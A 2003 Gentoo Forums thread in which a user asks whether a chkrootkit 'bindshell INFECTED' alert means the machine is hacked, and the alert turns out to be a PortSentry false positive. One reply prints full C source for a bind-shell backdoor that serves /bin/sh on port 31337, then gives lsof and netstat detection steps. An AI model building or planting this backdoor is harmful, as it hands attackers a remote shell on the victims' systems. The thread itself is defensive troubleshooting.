Gentoo Forums
Gentoo Forums
Gentoo Forums
Quick Search: in
Hacked Maybe???
View unanswered posts
View posts from last 24 hours

 
Reply to topic    Gentoo Forums Forum Index Networking & Security
View previous topic :: View next topic  
Author Message
Gent
n00b
n00b


Joined: 24 May 2003
Posts: 6

PostPosted: Wed May 28, 2003 2:03 am    Post subject: Hacked Maybe??? Reply with quote

I'll admit that I don't know that much about security, though I am trying to learn more. I recently installed chkrootkit mainly because I was just curious. When I ran it I came accross this:
Code:

ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not infected
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... not infected
Checking `inetd'... not infected
Checking `inetdconf'... not found
Checking `identd'... not found
Checking `killall'... not infected
Checking `ldsopreload'... not infected
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not found
Checking `mail'... not found
Checking `mingetty'... not found
Checking `netstat'... not infected
Checking `named'... not found
Checking `passwd'... not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... not infected
Checking `rpcinfo'... not infected
Checking `rlogind'... not found
Checking `rshd'... not found
Checking `slogin'... not infected
Checking `sendmail'... not infected
Checking `sshd'... not infected
Checking `syslogd'... not infected
Checking `tar'... not infected
Checking `tcpd'... not infected
Checking `top'... not infected
Checking `telnetd'... not found
Checking `timed'... not found
Checking `traceroute'... not found
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... no suspect files
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... nothing found
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... nothing found
Searching for suspicious files and dirs, it may take a while...
/usr/lib/.keep /usr/lib/perl5/5.8.0/i586-linux/auto/ExtUtils/MakeMaker/.packlist /usr/lib/perl5/5.8.0/i586-linux/auto/Safe/.packlist /usr/lib/perl5/5.8.0/i586-linux/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux/auto/Net/SSLeay/.packlist /usr/lib/twin/.twinrc /usr/lib/twin/.twenvrc.sh /lib/.keep /lib/dev-state/.keep

Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ShitC Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... nothing found
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for OBSD rk v1... nothing found
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... INFECTED (PORTS:  1524 31337)
Checking `lkm'... nothing detected
Checking `rexedcs'... not found
Checking `sniffer'...
eth0 is not promisc
eth1 is not promisc
Checking `wted'... nothing deleted
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'...
nothing deleted

just what exactly is bindshell anyway and what does it mean that it is infected.
Back to top
View user's profile Send private message
dma
Guru
Guru


Joined: 31 Jan 2003
Posts: 437
Location: Charlotte, NC, USA

PostPosted: Wed May 28, 2003 2:29 am    Post subject: Reply with quote

Here's "bindshell" (bind a shell to a port):
http://home.tiscali.be/tusca/intru2/grp6/bindshell.html

Code:
/* quick thingy... bind a shell to a socket... defaults to port 31337 */
/* code by pluvius@io.org                                             */
/* don't forget.. when you connect to the port.. commands are like:   */
/* "ls -l;" or "exit;" (don't forget the ';')                         */

#define PORT 31337
#include
#include
#include
#include
#include

int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;

int main ()
{
    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (soc_des == -1)
        exit(-1);
    bzero((char *) &serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    serv_addr.sin_port = htons(PORT);
    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
    if (soc_rc != 0)
        exit(-1);
    if (fork() != 0)
        exit(0);
    setpgrp(); 
    signal(SIGHUP, SIG_IGN);
    if (fork() != 0)
        exit(0);
    soc_rc = listen(soc_des, 5);
    if (soc_rc != 0)
        exit(0);
    while (1) {
        soc_len = sizeof(client_addr);
        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
        if (soc_cli < 0)
            exit(0);
        cli_pid = getpid();
        server_pid = fork();
        if (server_pid != 0) {
            dup2(soc_cli,0);
            dup2(soc_cli,1);
            dup2(soc_cli,2);
            execl("/bin/sh","sh",(char *)0);
            close(soc_cli);
            exit(0);
        }
    close(soc_cli);
    }
}

(they removed the #include filenames to prevent kiddie abuse.)

This is *BAD NEWS*. Find out which user is running it, possibly using:
Code:
lsof | grep 31337

or:
Code:
netstat -epl -A inet


(although this won't work if they replaced netstat/lsof or loaded a kernel module that hides the connections.)

Find out where the bindshell is located and who owns the bindshell file. Try to determine when it was planted. If it is running as root then you might want to rebuild from scratch. YOU CAN'T TRUST ANYTHING.
Back to top
View user's profile Send private message
Gent
n00b
n00b


Joined: 24 May 2003
Posts: 6

PostPosted: Wed May 28, 2003 2:44 am    Post subject: Reply with quote

output from
Code:

netstat -epl -A inet

Code:

tcp        0      0 *:31337                 *:*                     LISTEN      root       3699       2146/portsentry
udp        0      0 *:31337                 *:*                                 root       3755       2148/portsentry
Back to top
View user's profile Send private message
dma
Guru
Guru


Joined: 31 Jan 2003
Posts: 437
Location: Charlotte, NC, USA

PostPosted: Wed May 28, 2003 2:57 am    Post subject: Reply with quote

http://www.chkrootkit.org/

Look at #7:

Quote:
7. I'm running PortSentry/klaxon. What's wrong with the bindshell test?

If you're running PortSentry/klaxon or another program that binds itself to unused ports probably chkrootkit will give you a false positive on the bindshell test (ports 114/tcp, 465/tcp, 511/tcp, 1008/tcp, 1524/tcp, 1999/tcp, 3879/tcp, 4369/tcp, 5665/tcp, 10008/tcp, 12321/tcp, 23132/tcp, 27374/tcp, 29364/tcp, 31336/tcp, 31337/tcp, 45454/tcp, 47017/tcp, 47889/tcp, 60001/tcp).


You seem to be safe (so long as portsentry isn't compromised).
Back to top
View user's profile Send private message
Gent
n00b
n00b


Joined: 24 May 2003
Posts: 6

PostPosted: Wed May 28, 2003 2:59 am    Post subject: Reply with quote

Well I just did a search for bindshell and nothing came back. I'm just wondering if the portsentry is supposed to do this.
Back to top
View user's profile Send private message
Gent
n00b
n00b


Joined: 24 May 2003
Posts: 6

PostPosted: Wed May 28, 2003 3:03 am    Post subject: Reply with quote

Well I just got through with a search on the Net and found that when you run Portsenty chkrootkit will give a false alert. In the future I'll know to ignore this or at least not jump to conclusions. Anyways thanks for the help.
Back to top
View user's profile Send private message
Display posts from previous:   
Reply to topic    Gentoo Forums Forum Index Networking & Security All times are GMT
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum